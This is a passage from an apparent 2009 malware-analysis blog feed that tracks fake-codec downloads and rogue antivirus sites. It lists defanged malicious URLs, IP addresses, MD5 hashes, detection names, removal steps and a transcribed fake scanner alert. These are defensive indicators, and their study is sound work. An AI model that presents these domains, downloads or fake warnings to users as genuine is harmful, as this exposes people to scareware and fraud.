style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="25" height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td width="547"&gt;&lt;br /&gt;&lt;b&gt;Redirectors used&lt;/b&gt;: hxxp://us-euro.biz/in.cgi?4&amp;amp;parameter=wifi&lt;br /&gt;[195.190.13.234]&lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=ff1eeb8db71dfbfc2ae2710aada59ad1&amp;amp;t=1238292178&amp;amp;type=js"&gt;Analysis here &lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://loyaltube10.com/scan/?id=..&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://loyaltube10.com/tube/?id=197&amp;amp;title=adult+movie&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://loyaldown11.com/codec/.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;   &lt;td colspan="2"&gt;hxxp://loyaldown11.com/codec/189.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://loyaldown11.com/codec/197.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="144"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;codec.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;107011 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;704298be5c6bf8671517c79b827c9206&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=704298be5c6bf8671517c79b827c9206" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/ca71008c571ddad0dd20a0beae25511e" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=152859c8c639017940df5f3865ec05a6f" target="_blank"&gt;Report (related: WinPC Defender)&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;&lt;span id="status_fecha"&gt;03.29.2009 01:17:30 (CET)&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;6/39 (15.39%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="185"&gt;&lt;span style="color:#FF0000"&gt;(Suspicious) - DNAScan&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;CAT-QuickHeal&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt; eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Downloader-BON&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Downloader-BON&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee+Artemis&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="185"&gt;&lt;span style="color:#FF0000"&gt;TrojanDropper:Win32/Insebro.A&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Malware-Cryptor.Win32.Zorq&lt;/span&gt;&lt;/td&gt;&lt;td&gt;VBA32&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://tubeloyal.com/scan/?id-..&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://loyaldown11.com/codec/.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="144"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;codec.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;107008 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;eb61517f7f0906dc0e60f0e0afd1bbf1&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=eb61517f7f0906dc0e60f0e0afd1bbf1" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/cef114cf8e0664be1db2657fe7b14a54" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=15b6fc83f49230144f5bf187c8020dcda" target="_blank"&gt;Report (related: WinPC Defender)&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;&lt;span id="status_fecha2"&gt;03.29.2009 01:41:38 (CET)&lt;/span&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;6/39 (15.39%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="185"&gt;&lt;span style="color:#FF0000"&gt;(Suspicious) - DNAScan&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;CAT-QuickHeal&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt; eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Downloader-BON&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Downloader-BON&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee+Artemis&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="185"&gt;&lt;span style="color:#FF0000"&gt;TrojanDropper:Win32/Insebro.A&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Malware-Cryptor.Win32.Zorq&lt;/span&gt;&lt;/td&gt;&lt;td&gt;VBA32&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Associated websites:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;[213.163.65.10]&lt;br /&gt;loyaltube.com&lt;br /&gt;loyaltube09.com&lt;br /&gt;loyaltube10.com &lt;br /&gt;rakompoporyadkunazaryadku.com &lt;br /&gt;setupdatdownload.com &lt;br /&gt;tubeloyal.com &lt;br /&gt;velzevuladmin.com &lt;br /&gt;win-pc-defender.com&lt;br /&gt;xp-police-09.com&lt;br /&gt;xp-police-2009.com&lt;br /&gt;xp-police-antivirus.com&lt;br /&gt;xp-police-av.com&lt;br /&gt;xp-police-engine.com&lt;br /&gt;&lt;br /&gt;[213.163.65.9]&lt;br /&gt;loyaldown09.com&lt;br /&gt;loyaldown11.com &lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-3571026513580551420?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/3571026513580551420'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/3571026513580551420'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/loyaldown-loyaltube-fake-codec-and.html' title='loyaldown-loyaltube Fake Codec and RogueAV'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sc6-7cbL0RI/AAAAAAAAAQI/C7I674PhTLE/s72-c/loyaltube09.com-FakeScanner.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-574802831309357886</id><published>2009-03-28T09:10:00.000-07:00</published><updated>2009-03-28T16:36:42.738-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Anti-Virus1'/><category scheme='http://www.blogger.com/atom/ns#' term='FakeXPA'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti-Virus Number-1'/><category scheme='http://www.blogger.com/atom/ns#' term='av-best.info'/><category scheme='http://www.blogger.com/atom/ns#' term='AntiVirus-Number-1'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti-Virus-Number-1'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='AntivirusN1'/><category scheme='http://www.blogger.com/atom/ns#' term='My computer Online Scan'/><title type='text'>av-best-info Anti-VirusN1 Rogue FakeXPA</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="1749" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;  &lt;td colspan="2" valign="top" height="833"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;av-best.info &amp;quot;VirusDoctor Online Scan&amp;quot; Anti-Virus1 Rogue FakeXPA&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;av-best.info is a site that distribute &lt;b&gt;AntivirusN1&lt;/b&gt; a  rogue antivirus application. &lt;br /&gt;
  AntiVirusN1 displays fake alerts in order to persuade users buying it. &lt;br /&gt;&lt;/p&gt;&lt;div style="border:solid 1px #0C0; width:500px; padding:15px"&gt;Registry keys/values must be deleted with antivirus / antispyware.&lt;br /&gt;Anti-Virus Number-1 can be removed by stopping the following processes&lt;br /&gt;&lt;br /&gt;
    - Kill processes: &lt;b&gt;N1Two.exe&lt;/b&gt;, &lt;b&gt;N1i.exe, 2.exe, 3.exe&lt;br /&gt;  &lt;/b&gt;- Unregister DLLs (regsvr32 /u [dll_name]): &lt;b&gt;QWProtect.dll&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;- Delete files and folders:&lt;br /&gt;&lt;br /&gt;&lt;ul style="list-style-type:none"&gt;  &lt;li&gt;► C:\Documents and Settings\All Users\Application Data\N1&lt;br /&gt;  &lt;/li&gt;  &lt;li&gt;► %CommonAppData%\N1 &lt;br /&gt;  ► %CommonPrograms%\Anti-Virus Number-1&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;This site appear to be normal at first sight.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc6kNvHPZzI/AAAAAAAAAPg/Gibm24vGSe8/s1600-h/Anti-Virus_Number-1-Fake-Anti-Virus1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 262px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc6kNvHPZzI/AAAAAAAAAPg/Gibm24vGSe8/s320/Anti-Virus_Number-1-Fake-Anti-Virus1.jpg" border="0" alt="Antivirus 1 Site Screenshot"id="BLOGGER_PHOTO_ID_5318368765863225138" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6kOLL7P5I/AAAAAAAAAPo/qv-1MYaYcLA/s1600-h/Anti-Virus1_fraudulent_payment.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 222px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6kOLL7P5I/AAAAAAAAAPo/qv-1MYaYcLA/s320/Anti-Virus1_fraudulent_payment.jpg" border="0" alt="Antivirus 1 Payment system"id="BLOGGER_PHOTO_ID_5318368773399068562" /&gt;&lt;/a&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc6kNvHPZzI/AAAAAAAAAPg/Gibm24vGSe8/s1600-h/Anti-Virus_Number-1-Fake-Anti-Virus1.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The payment system for this fraudulent and rogue program is made via Plimus (screenshot below)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6oKKHP5vI/AAAAAAAAAPw/B2ANUXbGCPM/s1600-h/Plimus-Anti-Virus1_fraudulent_payment.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 211px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc6oKKHP5vI/AAAAAAAAAPw/B2ANUXbGCPM/s320/Plimus-Anti-Virus1_fraudulent_payment.jpg" border="0" alt="Antivirus 1 Payment system by Plimus"id="BLOGGER_PHOTO_ID_5318373102438049522" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;But the site has been reported as malicious by some users. Here is the fake scanner&lt;br /&gt;&lt;br /&gt;Site screenshot:&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake  Security Warning Message&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;Adware.Win32.Look2me.ab Virus Critical &lt;br /&gt;Backdoor.Win32.Haxdoor.gu Virus High &lt;br /&gt;Trojan-Downloader.Win32.Small.dge Virus High &lt;br /&gt;Trojan Horse IRC/Backdoor.SdBot4.FRV Virus Medium &lt;br /&gt;W32.Benjamin.Worm Virus High &lt;br /&gt;W32.Mypics.Worm.36352 Virus Medium &lt;br /&gt;W32.Yaha.B@mm Virus Critical &lt;br /&gt;Trojan Horse Generic11.OQJ Virus High &lt;br /&gt;Magic DVD Ripper Virus High &lt;br /&gt;Recommend: Click &amp;quot;Start Protection&amp;quot; button to erase all threats&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHxh_wDI/AAAAAAAAAPY/5r-FLGKzlYA/s1600-h/FakeAlertMessage3.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 177px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHxh_wDI/AAAAAAAAAPY/5r-FLGKzlYA/s320/FakeAlertMessage3.jpg" border="0" alt="Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5318303792247062578" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHYwipoI/AAAAAAAAAPQ/l9_Z_EtgEXc/s1600-h/FakeAlertMessage2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 302px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHYwipoI/AAAAAAAAAPQ/l9_Z_EtgEXc/s320/FakeAlertMessage2.jpg" border="0" alt="Fake Security Warning Message: Threat detected"id="BLOGGER_PHOTO_ID_5318303785597183618" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHXTsYrI/AAAAAAAAAPA/uXjTTx3ig3A/s1600-h/FakeScannerPage.jpg"&gt;
  &lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 274px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5pHXTsYrI/AAAAAAAAAPA/uXjTTx3ig3A/s320/FakeScannerPage.jpg" border="0" alt="Fake scanner page"id="BLOGGER_PHOTO_ID_5318303785207751346" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5pG6_nOeI/AAAAAAAAAO4/75zeDWyd-Og/s1600-h/FakeScanner.jpg"&gt;
